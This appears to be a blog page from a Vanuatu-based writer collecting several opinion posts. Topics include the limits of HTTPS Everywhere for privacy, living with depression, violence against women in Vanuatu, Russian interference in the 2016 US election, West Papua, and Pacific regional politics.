HTTPS Everywhere – what is it good for?

There’s a growing chorus of voices in infosec these days, calling for the effective deprecation of unencrypted traffic over the web. The only useful purpose port 80 serves these days, they argue, is to redirect to port 443.

Their arguments tend to run along these lines:

  1. HTTPS is the right way to handle encryption on your website (and other services, too). That’s true. It’s a well-established, well-understood standard that has gone through some awkward moments, but has emerged from the process as a robust and easy-to-use security layer on your web server.
  2. HTTPS protects you from unethical ISPs/states/actors who like to inject your traffic with unwanted ads and other nasties. That’s somewhat true, but requires a little unpacking, because there are some notable edge cases:
    1. Many corporations install their own certificate authority on approved devices, and use their own certificates to intervene in communications between you and other secure sites. This allows them to sit in the middle of your communication with your bank, for example.
    2. Anyone who can get access to either of the end points can simply watch the unencrypted traffic on either end, rendering any security measures in the communications protocol moot.
    3. Setting up and breaking down a secure session is an extremely difficult process that is well-understood by a very few people. The theory is clear enough, but applying it in practice can get hairy. The 2016 WPAD exploit is a prime example. It was demonstrated that you could use a near-obsolete, insecure method of discovering your network’s proxy settings to eavesdrop on secure communications. (Of course, if you could manipulate that setting, you could pretty much do what you want to the browser anyway. The point here is that there are ways for people to eavesdrop on your secure communications and leave you none the wiser, with or without HTTPS.)
    4. Establishing the identity of remote sites is still a bit fraught. It’s better today than it was in the past, but an SSL cert on its own is insufficient in the absence of a broader, systematic web of trust. These things require international cooperation, protocols and standards. Not all parties want the same thing, and few indeed are focused only on what’s best for the end user’s privacy. HTTPS Everywhere doesn’t move the markers in this part of the debate.
    5. Cross-site tracking cookies are a much more pernicious and troubling way for unscrupulous commercial actors to inject themselves into your day to day web traffic.

None of these are arguments against the use of HTTPS. You should use it when you can. Just because the other guy’s going to win doesn’t mean you shouldn’t at least make him work for it. But these are considerations that have to be borne in mind when people start suggesting that a web with HTTPS everywhere is a safer, more private place for everyone.

  1. HTTPS is growing in use. Get on board! That’s an argumentum ad populum. It’s a useful observation—and a Good Thing—but not reason to move in and of itself.
  2. Plain old HTTP is insecure, and untrustworthy. The first part is true, and people should know it. Google Chrome’s recent decision to mark all plain text websites as insecure is a good move. But the question of trust is more a practical than a technical issue. In other words, you can communicate securely with an untrustworthy information source, and you can communicate insecurely with a trustworthy source. Trust between end points needs to be distinguished from trust in the communications medium. Technical experts who advocate for HTTPS everywhere sometimes confuse the two. Non-technical people often do. Which means we have to be extremely circumspect about what we promise when we talk about making things more secure for them.
  3. HTTPS is secure and will protect you from eavesdropping. Yes it is, and no it will not. Yes, the protocol is solid. It’s really easy to do right (which is incredibly important for security), and it works for the purpose intended. But it’s only one part of a much, much bigger picture. As Bruce Schneier is fond of saying, the bad guys only need to find one way to win. Most systems have more than one way in. Many systems allow state-sanctioned eavesdroppers in through the front door.
  4. Encrypting even normal traffic means that you’re protected from state surveillance across the board. If they can’t differentiate your traffic, it makes it harder for them to single out the things they object to. Sad to say, the real world doesn’t work that way.

If a state wants to watch what you’re accessing over the web, they will find a way. At very least, they will know the end points you’re connecting to. If they’ve singled you out for observation, you’re going to face issues even if you use TOR, VPNs and other tools. Between compromised devices, networks and information providers, your options are quite limited if people decide to watch you individually.

If you’re not being singled out, they probably don’t care what you’re looking at. They might care about individual sources, but in cases like that, they’ll just block the site sources.

But wait—what about someone who’s not yet been targeted, and doesn’t want to be? Good question. There’s a marginal case there, but again, using HTTPS Everywhere is probably not going to be the decisive factor. It sure isn’t in China.

There are very good reasons to support the spread of HTTPS. Anybody who tells you otherwise is just… wrong. You should use it when you’re doing anything that involves your personal information. That includes everything from chatting with friends about what movies are good to transferring millions into your superyacht fund.

But to conclude from this that ‘the only purpose for port 80 these days is to redirect to HTTPS’ is a bit naïve, sad to say. It assumes that there are technical solutions to social/political problems. That’s not necessarily true:

  1. We’d be vastly better off with regulatory/legislative intervention to stop ISPs and others from messing with your web traffic. The reason for this is that removing the mandate to inject gunk into your web traffic is a far more effective way of circumscribing what ISPs are allowed to do. Let’s call it (part of) Net Neutrality. With or without HTTPS, we still need this regulation. Politically, cynical ISPs can point to HTTPS Everywhere and use it as an argument against net neutrality regulation. It’s not entirely rational, but that’s not to say the argument would be ineffective.
  2. When changing collective behaviour, it’s often better to proscribe the behaviour rather than prescribe the technical cure. People will always seek ways to fulfil the letter of the law and still achieve their own selfish ends. So an emphasis on better law is generally more effective than emphasising better tech.
  3. State actors and other surveillance groups generally don’t care that you’re looking at public access websites. When they do care, they just block the site at the ISP level. Yes, there are edge cases where you can get in before they know it matters, but that’s true with and without HTTPS. Encryption does add a slight advantage when it comes to internet whack-a-mole, but it’s only slight. And it’s likely to be ephemeral.
  4. If someone really wants to track you, they will compromise your end points, not the network layer. This is what China does. They just sit people inside the offices of the main online services. Law enforcement and signals intelligence agencies do much the same thing. They’ll either compromise your devices, or they’ll compromise the other end-point, often with the assistance of the service provider. The FBI attempted this with TOR, with partial success.
  5. HTTPS is easy, yes, but easy is not the same as simple. Just because you’ve got your cert properly set up doesn’t mean you’re safe. Focusing on HTTPS to the exclusion of other considerations or overselling its benefits could create a false sense of security. It’s far easier to designate something ‘untrusted’ than it is to determine that the same thing is ‘trusted’. We need to be careful about what we’re selling when we say that HTTPS Everywhere makes us more secure.

Widespread use of HTTPS is a Good Thing, and should be encouraged. But mandating its use everywhere is of limited additional utility where your practical security is concerned.

In a nutshell, universal HTTPS alone is insufficient to change or curb malicious human behaviour; and the additional measures that are necessary don’t require HTTPS everywhere to succeed.

HTTPS everywhere would achieve only a marginal and possibly ephemeral gain. In practical terms, people who are most vulnerable to unwanted collective or individual surveillance by state actors gain very little from this.

But let’s keep perspective: Opposing HTTPS Everywhere is a foolish waste of time and effort. We should encourage its spread. What we should NOT do, though, is pretend that the end of port 80 is the end of our privacy concerns, or even a particularly notable win. It’s a marginal improvement at best.

My beef is with people who think this is a big win for privacy. It’s emphatically not.

Living with depression is better than the alternative. Until it’s not.

Preface: People need to understand that, for a lot of us, no amount of affirmation is going to change how we feel. Depression is treatable in many cases, but not necessarily curable in any case. This means that sentimentalising the problem is emphatically the wrong approach.

It is for me, at least. It drives me up the fucking wall to have to listen to people tell me how good I am, how much better the world is with me in it, how if I just stick with it a little longer, things will get better.

Because here’s the thing: They may get better for you, but for me they don’t.

I cope better on some days than others. I’ve had a lot of practice. I find ways to experience joy in the midst of overwhelming sorrow. But that doesn’t mean the sorrow goes away. You may have trouble grasping this—lord knows I do—but you can feel good about yourself and be the same worthless person you were when you woke up this morning. There is no contradiction there.

People think that when we say, ‘it’s all in your head’ it’s therefore transient, ephemeral and mutable. It’s not. You can change what you think about it, but you cannot change the thing itself.

So if, in the course of reading this, you find yourself wishing me well… don’t. I’m not well. I never have been, and I never will be. But I have a life. It’s a good one, and I’m not stupid enough to fail to recognise that. So kindly refrain from reminding me.

Now, on to my confession…. Continue reading

SHAME

People’s attitudes toward women are ruining lives, and it’s sickening

A few days ago, I heard news about someone whom I’ve known for almost as long as I’ve been in Vanuatu. She was tied by her hair to a post and beaten senseless by her partner.

Save your anger. I don’t want to hear it. Your outrage is meaningless to me.
You did this. Every single one of you.

Admit it: you loved it when they posted a false report that a local woman had been arrested for prostitution. She was framed and shamed simply because she’d had more than one partner. And you automatically believed she was guilty.

You loved it when a local man was wrongly accused of sexual assault and consorting with prostitutes. He was outed because he refused to lie about someone else. The threat could only work because you were willing to believe the woman was a whore.

You downloaded and shared copies of the intimate photos taken of a young professional who was tricked into sharing them with a man who swore that he was single. His wife takes him back, and the woman he lied to is the one who’s punished. Every time she walks into a meeting, she has to ask herself, ‘have they seen them?’

Yes, she was naïve. Do you think that justifies years of anguish?

You blamed her. You blamed her for being treated cruelly by others.

Blame yourself. You heard your neighbours fighting. You heard that woman cry out. You saw her tears.

You. Not someone else. Not someone down the road or in the next yard.

You’re reading this and thinking I’m talking about everyone else. I am talking about you.

For months, you did nothing after your neighbour buried his wife under a nakatambol tree. You didn’t even ask where she was.

You let a girl jump to her death from a moving bus. You let her death go unpunished. And then to add insult to injury, you warned young women not to travel at night.

You didn’t lift a finger when that faith healer groped and sexually assaulted your daughter. Just changed churches and warned your daughter to look after herself. You were the one who sent her to him.

You let a pastor—a pastor—beat a woman in broad daylight in the main street of town, and you did nothing but stand around gawping.

Stop shifting the blame. Stop pretending that it’s not all men. Because it is all men. It’s all of us. Every single one of us. Yes, me too.

And you.

Not the other readers: YOU

When is it going to dawn on you that the way we treat our women is our national shame? What is it going to take?

My shame is real. I’ve known this woman for over a decade, and when we were neighbours, I made sure nothing happened to her. But I moved on and she didn’t. And I said nothing last week when she showed up with a black eye. I didn’t want her to feel bad. Now this happens, and I’m ashamed of my cowardice. I did nothing to support her.

No longer.

But anything I do won’t make one bit of difference if the rest of you continue being the callous, uncaring people that you’ve been. Don’t deny it. There is not an adult in Vanuatu who hasn’t turned a blind eye toward abuse. If you think you’re not part of the problem, then you’re a bigger part of it than you know.

You read that clickbait smear. You read that post, and you believed it. Even now, you’re twisting around, trying to find a way to defend your prejudice. You can’t. It was a pack of lies.

But you believed it because that’s what you think women are like.

I can’t even bring myself to care whether I’ve changed your mind any more. All I have to say is shame. Shame on me for letting a friend hurt so much. For letting so many suffer. Shame on me for letting you get away with it.

I don’t know how I’m going to sleep tonight. But to my shame, I know I will.
And shame on you. It could all change tomorrow. But it won’t. Because of you.

If you really are sincere about wanting to make things better, read this again, and accept in your heart of hearts that I am talking about you. And for once in your life, feel a bit of shame for your role in this suffering.

Then do something about it. Every day. Until the job is done, and the shame is gone.

Outside Influences

Something that’s been bothering me about ‘outside’ influences….
 
One of the common refrains that you hear whenever someone advocates for change–here in Vanuatu, and throughout the world–is that these are foreign ideas imposed by radically different cultures. In other words, they’re incompatible with the way of life we’ve enjoyed since we were created according to our particular culture’s creation story.
 
But most progressive ideas are not foreign ideas. They’re not ‘western’, and they certainly are not incompatible.
 
How do I know? Because I know my own culture. I come from a deeply conservative Irish background, and there is nothing in my heritage that drove me to protest nuclear proliferation, to oppose government corruption, to advocate for environmental causes, or to oppose violence against women and children.
 
I learned all those things on my own. Yes, I am happy and grateful to be able to stand on the shoulders of giants in all of these things. The people who pioneered these concepts in Vanuatu–Marc Neil-Jones, Wan Smolbag, Merelyn Tahi, Grace Molisa, Florence Leingkon, and now Stephanie Ephraim–are not western dupes. They are all the opposite of easily led.
 
People who have the strength to campaign for justice, who have the courage to belief that we owe our children a better world… they’re not stooges of the New World Order. They are your brother, your sister, your auntie, your dad.
 
Respect for kastom? Yes. Absolutely. As long as kastom means peace and harmony FOR ALL.
 
But when ‘respect’ means sit down and shut up and wait your turn (which will never come, because it’s always my turn), that’s not kastom. That’s just plain old wrong.
 
Our culture should stand strong against outside influences? Well… I don’t know. Culture–all culture, everywhere–is changing every day, every moment. Kastom and culture are who we are today. They are who we are yesterday, too. And tomorrow.
 
And each of those is different.
 
Oppose change if you must. But if you do, at least to honest enough to attack the idea on its merits, not merely because it’s ‘not ours’.
 
Nobody told Flo she didn’t have to take it any more. Nobody told Steph to get cussing mad. Nobody told Grace to denounce injustice. Nobody told Merelyn to devote herself to saving lives.
 
Their experience, their insight, and their activism is born out of the blood and soil of Vanuatu just as much as Independence was.

Did Russia ‘hack the election?’ Yes and No

Here’s a quick summation of where we stand, based on public domain analysis and reporting, vis-à-vis the purported Russian ‘hack’ of the US Presidential election.

Anyone who claims that the Podesta emails were not real is delusional. There’s no real dispute over that.

Anyone who believes that Julian Assange isn’t biased against Hilary Clinton is also delusional. Mr Assange also shows a disturbingly willful blindness to find any problems with the state of civil liberties and human rights in Russia—this, again, is not really subject to controversy.

Anyone who believes that Assange can be certain about the origin of the Podesta emails doesn’t understand chain of custody. His de facto imprisonment in the Ecuadorian Embassy makes it physically impossible for him to objectively, empirically verify any claims of provenance. If this were evidence for the courts, he wouldn’t be allowed to testify as to the provenance of the emails.

Anyone who has examined the pattern of overt and covert activities as already detailed by public domain sources that has been judged with a high or a moderate level to confidence to originate from the Russian state would be foolish to deny that there isn’t a strong preponderance of evidence that yes, Russia conducted an anti-Clinton (dis)information campaign.

On-the-record print and TV interviews with avowed state-paid Russian trolls who profess a strong preference for Donald Trump constitute probitive evidence of a classic old-school dezinformatsiya effort. It’s something that both sides used frequently in the Cold War. RT’s overt anti-Clinton editorial slant is obvious, and strongly contributory. Assange’s frequent appearances on the channel are evidence of nothing more than a bit of narcissism on his part.

The fact that the APT28 modus operandi is consistent with well-documented spying activities against the Bundestag as well as the TV5 cyber-attack is a substantive plank in the circumstantial case. The fact that APT28 code was almost exclusively developed in a Russian language build environment, in the Moscow time zone is damning. The fact that that they used of bit.ly as an URL-obfuscator—and then committed a rooky OPSEC slip-up that allowed investigators to see what other individuals were targeted by the same account—is compelling. The fact that APT28 source has been found in the wild doesn’t diminish the likelihood that this particular use of it originated from the Russian state. The use of encryption keys and certs (e.g. the way the software ‘phones home’ securely) pretty much makes it impossible for third parties to use the code without significant—and obvious—re-engineering. There is no evidence of such changes. In fact, at least one cert used in the Bundestag hacks was re-used in this effort.

The evidence suggesting that Guccifer 2.0 is almost certainly not Romanian (as ‘he’ claimed), and is probably a Russian speaker, is not probitive, but it’s strongly contributory to a conclusion that the account is a sock puppet, probably linked to a Russian source.

The USA intelligence community lacks credibility. It has relied far too much on its own much-sullied authority to make its arguments. But its credibility is laughable, and its patent insincerity and systematic dishonesty is demonstrated by a mountain of evidence. The fact that their assertions are consistent with open-source evidence indicates, however, that they’re not lying about everything—this time. That does nothing to diminish the fact that they’re driving a clear agenda, possibly because they don’t trust Donald Trump and they feel he’s compromised, or at least willing to put personal interest before national interest.

Conclusion: It’s not necessary to believe the CIA/NSA/FBI to conclude that there is a concerted Russian effort to subvert the integrity of key aspects of American democratic institutions, including the US Presidential election. The Russian state has motive, means, opportunity and there is sufficient evidence to suggest that, in absence of any more compelling explanation, they have probably been at it for quite some time. Did they ‘hack the election’? No. Did they sway it? They certainly put a lot of time and resources into the effort. Did they change the outcome? Probably not. The single event that correlates most closely with an actual swing in the electorate is James Comey’s letter to Congress concerning the Weiner laptop. Did they help swing it? Almost certainly, yes. There’s a compelling argument to be made that if countless sources—with Russian actors prominent among them—hadn’t worked so hard to poison the Clinton well, the Comey announcement wouldn’t have been so decisive.

Continue reading

Don’t argue as if the world were sane

Glenn Greenwald, in every respect a reputable, diligent and ferociously smart gadfly, continually forgets to remember that few people are as sane and as willing to be led by evidence as he is. It’s his great failing.

Nowhere is it more visible than in his incredulity toward the CIA and the rest of the US state security apparatus concerning their claims of Russian tampering in the election process. He is dead right to mistrust the CIA’s every utterance. Lying, after all, is a large part of what they do for a living. Likewise, a politicised and partisan FBI is not a useful source for agenda-free commentary on Russia’s disinformation campaign.

But none of the above provides a sufficient basis to say that Russia has not played a direct and active role in the subversion of the American democratic process. Using the espionage establishment’s lack of credibility to refute the claim of Russian meddling is completely illogical.

We discount or discard the CIA’s claims precisely because we know that they’ve done far, far worse countless times in the past. We know they’ve planted or spun innumerable stories. To people living in vulnerable parts of the world, it’s simply axiomatic that Voice of America and USAID are tools of American influence. We also know they regularly use economic leverage to bring about certain policies, and they regularly plant stories to tarnish the image of any government that doesn’t toe their line.

Yes, they’re hypocrites and liars. Nobody disputes that. Yes, they’re guilty of exactly the sins of which Russia stand accused. But if anything, that realisation should reinforce the suspicion that Russia might be giving back as good as it gets. (Or better, depending on where you stand and how you feel about the success of the campaign to tarnish Hillary Clinton’s reputation.)

The sins of which the Russians stand accused are exactly the things that powerful countries do. They do it continually, shamelessly and cynically. It’s what they do. Continue reading

Weapons of the Weak

Radio New Zealand journalist Johnny Blades created a memorable image last week when he posted a montage of six heads of government from some of the smallest states of the world, each standing at the podium at the United Nations General Assembly.

The leaders of these six countries—Vanuatu, Solomon Islands, Tonga, Nauru, Marshall Islands and Tuvalu—all raised the issue of continuing human rights abuses in West Papua, and advocated for its right to self-determination.

These representations should by rights have emerged from the Pacific Islands Forum in Palau, but if rumour is to be trusted, the organisation’s larger economies are responsible for the Forum’s resounding silence on the issue.

In a tacit demonstration of the unwillingness to live within the Forum’s constraints, a half dozen Pacific leaders engaged in an orchestrated manoeuvre, a chorus of complaint against the clear pattern of systemic disregard for the human rights of indigenous West Papuans.

Talk may be all we can do about it, but at least we can do that. Continue reading

Advisors were never the problem

It’s always someone else’s fault. Even when we were kids, it was always little brother or sister who stole the cookies, spilled the milk or woke the baby. Then you went to school, and it was the kid at the desk behind you.

Then you began to work, and it was anyone but you. Now you’re on the national stage, and it’s not Vanuatu’s fault; it’s some insidious foreigner whose life is devoted to subverting your country.

It ain’t that simple. It never was that simple.

Let’s get one thing out of the way: foreign technical advisors are just that—advisors. They have no executive power, they do not make policy, and they perform their work at the pleasure of the administration of the day.

When we start blaming technical advisors for our problems, we’re no better than a child blaming a sibling for something they both did. Nobody is forcing us to take advice. Continue reading

PIF-fle

The Pacific Islands Forum has come and gone, and people here in Vanuatu could not care less. There are few Pacific conclaves that generate less interest than this meeting.

In principle, nobody particularly disapproves of getting all Pacific leaders together once a year for a bit of a chat and maybe some minor course correction.

In practice, it seems clear that not all leaders are equal in the eyes of the Forum.

This year more than ever, the final communiqué simply side-stepped any views that didn’t suit the developed nation members.

The event might more accurately be described as the McCully/Bishop Forum.

The region-wide movement to disown PACER Plus was simply ignored in the final language. If Vanuatu needed any other excuse to walk away from this one-sided deal, their treatment in Pohnpei provided one. Scuttlebutt from the venue has it that France’s inclusion in the Forum was anything but a unanimous decision. Prime Minister Charlot Salwai exercised characteristic tact and diplomacy when asked about it, but it doesn’t take a crystal ball to imagine how Vanuatu, one of the staunchest supporters of decolonisation in the Pacific, felt about bringing France into the Forum fold.

France was excluded from the Forum specifically because of its refusal to discuss issues of decolonialisation when the organisation was formed in the 1970s.

West Papua is perhaps the only topic that could dampen Vanuatu’s joy following its under-20 football team winning their way to a World Cup berth. And once again, the Forum has gone to excruciating lengths to make the least possible effort to stop the ‘slow motion genocide’ under way in PNG’s eastern neighbour. Continue reading

Silence an ‘indictment’: Chetwynd

Justice Chetwynd yesterday acquitted the men accused of intentional assault on Florence Lengkon, accepting the defence’s submission that they had no case to answer on those specific charges.

The people of Vanuatu, however, have still to answer for their silence.

Judge Chetwynd ruled that there was indisputable evidence that Ms Lengkon was struck once ‘forcefully’ on the head, and said that if that was the case then it is impossible that all three men could be guilty of landing the blow.

The Prosecution’s case rested almost entirely on a statement submitted by two police officers, who stated that co-accused Elton Worwor put them at the scene of the crime.

But the police officers didn’t ask some very basic questions during that interview, such as how Mr Worwor knew they were involved, whether he actually saw them strike Ms Lengkon, and if so, which of the three of them actually struck her.

Ultimately, the evidence was ruled inadmissible. The three men charged with the assault on Ms Lengkon had no case to answer, and they were therefore acquitted of this serious charge.

But… Justice Chetwynd paused meaningfully before continuing. He scanned the packed courtroom and stated that the fact that over 50 people could have seen what happened and not one of them stepped forward to identify the culprit is ‘an indictment’ on our society. Continue reading